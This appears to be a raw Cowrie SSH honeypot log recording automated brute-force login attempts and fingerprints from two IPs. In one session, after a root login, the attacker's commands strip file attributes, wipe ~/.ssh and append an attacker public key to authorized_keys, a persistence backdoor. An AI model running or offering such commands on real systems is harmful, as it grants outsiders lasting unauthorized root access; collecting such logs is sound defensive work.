{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49748,"dst_ip":"1.2.3.4","dst_port":22,"session":"d393a7b4bb20","protocol":"ssh","message":"New connection: 212.227.235.229:49748 (1.2.3.4:22) [session: d393a7b4bb20]","sensor":"my-vps","timestamp":"2025-08-28T11:25:58.564878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:25:58.566113Z","src_ip":"212.227.235.229","session":"d393a7b4bb20"}
{"eventid":"cowrie.login.failed","username":"jim","password":"abc123","message":"login attempt [jim/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:25:58.656242Z","src_ip":"212.227.235.229","session":"28fcec76601e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:25:58.706406Z","src_ip":"212.227.235.229","session":"d393a7b4bb20"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:25:59.278827Z","src_ip":"212.227.235.229","session":"d393a7b4bb20"}
{"eventid":"cowrie.login.failed","username":"jim","password":"abcd123","message":"login attempt [jim/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:25:59.786633Z","src_ip":"212.227.235.229","session":"28fcec76601e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:00.421425Z","src_ip":"212.227.235.229","session":"d393a7b4bb20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50224,"dst_ip":"1.2.3.4","dst_port":22,"session":"be4bac71bde7","protocol":"ssh","message":"New connection: 212.227.235.229:50224 (1.2.3.4:22) [session: be4bac71bde7]","sensor":"my-vps","timestamp":"2025-08-28T11:26:00.573852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:26:00.574553Z","src_ip":"212.227.235.229","session":"be4bac71bde7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:26:00.718628Z","src_ip":"212.227.235.229","session":"be4bac71bde7"}
{"eventid":"cowrie.login.failed","username":"jim","password":"abcd1234","message":"login attempt [jim/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T11:26:00.916600Z","src_ip":"212.227.235.229","session":"28fcec76601e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:26:01.335058Z","src_ip":"212.227.235.229","session":"be4bac71bde7"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:01.481963Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:01.483090Z","src_ip":"212.227.235.229","session":"be4bac71bde7"}
{"eventid":"cowrie.login.failed","username":"jim","password":"abc1234","message":"login attempt [jim/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T11:26:02.049512Z","src_ip":"212.227.235.229","session":"28fcec76601e"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:03.180709Z","src_ip":"212.227.235.229","session":"28fcec76601e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36162,"dst_ip":"1.2.3.4","dst_port":22,"session":"32ebf810e67c","protocol":"ssh","message":"New connection: 212.227.125.160:36162 (1.2.3.4:22) [session: 32ebf810e67c]","sensor":"my-vps","timestamp":"2025-08-28T11:26:06.537596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:26:06.538613Z","src_ip":"212.227.125.160","session":"32ebf810e67c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:26:06.713548Z","src_ip":"212.227.125.160","session":"32ebf810e67c"}
{"eventid":"cowrie.login.failed","username":"test","password":"12345678","message":"login attempt [test/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T11:26:07.380685Z","src_ip":"212.227.125.160","session":"32ebf810e67c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:08.702510Z","src_ip":"212.227.125.160","session":"32ebf810e67c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33668,"dst_ip":"1.2.3.4","dst_port":22,"session":"32da148f2c6e","protocol":"ssh","message":"New connection: 212.227.235.229:33668 (1.2.3.4:22) [session: 32da148f2c6e]","sensor":"my-vps","timestamp":"2025-08-28T11:26:24.315901Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:24.494203Z","src_ip":"212.227.235.229","session":"32da148f2c6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33676,"dst_ip":"1.2.3.4","dst_port":22,"session":"7798ea02d73c","protocol":"ssh","message":"New connection: 212.227.235.229:33676 (1.2.3.4:22) [session: 7798ea02d73c]","sensor":"my-vps","timestamp":"2025-08-28T11:26:24.671526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:26:24.672710Z","src_ip":"212.227.235.229","session":"7798ea02d73c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T11:26:24.851758Z","src_ip":"212.227.235.229","session":"7798ea02d73c"}
{"eventid":"cowrie.login.failed","username":"cyrus","password":"cyrus1","message":"login attempt [cyrus/cyrus1] failed","sensor":"my-vps","timestamp":"2025-08-28T11:26:26.478929Z","src_ip":"212.227.235.229","session":"7798ea02d73c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:27.659894Z","src_ip":"212.227.235.229","session":"7798ea02d73c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54218,"dst_ip":"1.2.3.4","dst_port":22,"session":"35f1102bd07c","protocol":"ssh","message":"New connection: 212.227.235.229:54218 (1.2.3.4:22) [session: 35f1102bd07c]","sensor":"my-vps","timestamp":"2025-08-28T11:26:43.797707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:26:43.799400Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:26:43.878907Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.login.success","username":"root","password":"Passwort","message":"login attempt [root/Passwort] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:26:44.242298Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:26:44.837523Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:26:44.838319Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:26:44.839107Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:44.919898Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:26:45.097649Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:26:45.098380Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:26:45.180090Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:45.181007Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54228,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa1d06a25c3e","protocol":"ssh","message":"New connection: 212.227.235.229:54228 (1.2.3.4:22) [session: fa1d06a25c3e]","sensor":"my-vps","timestamp":"2025-08-28T11:26:45.259032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:26:45.259774Z","src_ip":"212.227.235.229","session":"fa1d06a25c3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:26:45.338637Z","src_ip":"212.227.235.229","session":"fa1d06a25c3e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:26:45.695457Z","src_ip":"212.227.235.229","session":"fa1d06a25c3e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:46.777372Z","src_ip":"212.227.235.229","session":"fa1d06a25c3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54242,"dst_ip":"1.2.3.4","dst_port":22,"session":"827c1a2b0f0d","protocol":"ssh","message":"New connection: 212.227.235.229:54242 (1.2.3.4:22) [session: 827c1a2b0f0d]","sensor":"my-vps","timestamp":"2025-08-28T11:26:46.858637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:26:46.859619Z","src_ip":"212.227.235.229","session":"827c1a2b0f0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:26:46.938823Z","src_ip":"212.227.235.229","session":"827c1a2b0f0d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:26:47.295612Z","src_ip":"212.227.235.229","session":"827c1a2b0f0d"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:47.375582Z","src_ip":"212.227.235.229","session":"35f1102bd07c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:47.376621Z","src_ip":"212.227.235.229","session":"827c1a2b0f0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49750,"dst_ip":"1.2.3.4","dst_port":22,"session":"27881d51bd4f","protocol":"ssh","message":"New connection: 212.227.235.229:49750 (1.2.3.4:22) [session: 27881d51bd4f]","sensor":"my-vps","timestamp":"2025-08-28T11:26:57.373898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:26:57.374797Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49342,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ec624f66614","protocol":"ssh","message":"New connection: 212.227.125.160:49342 (1.2.3.4:22) [session: 1ec624f66614]","sensor":"my-vps","timestamp":"2025-08-28T11:26:57.411828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:26:57.412432Z","src_ip":"212.227.125.160","session":"1ec624f66614"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:26:57.586070Z","src_ip":"212.227.125.160","session":"1ec624f66614"}
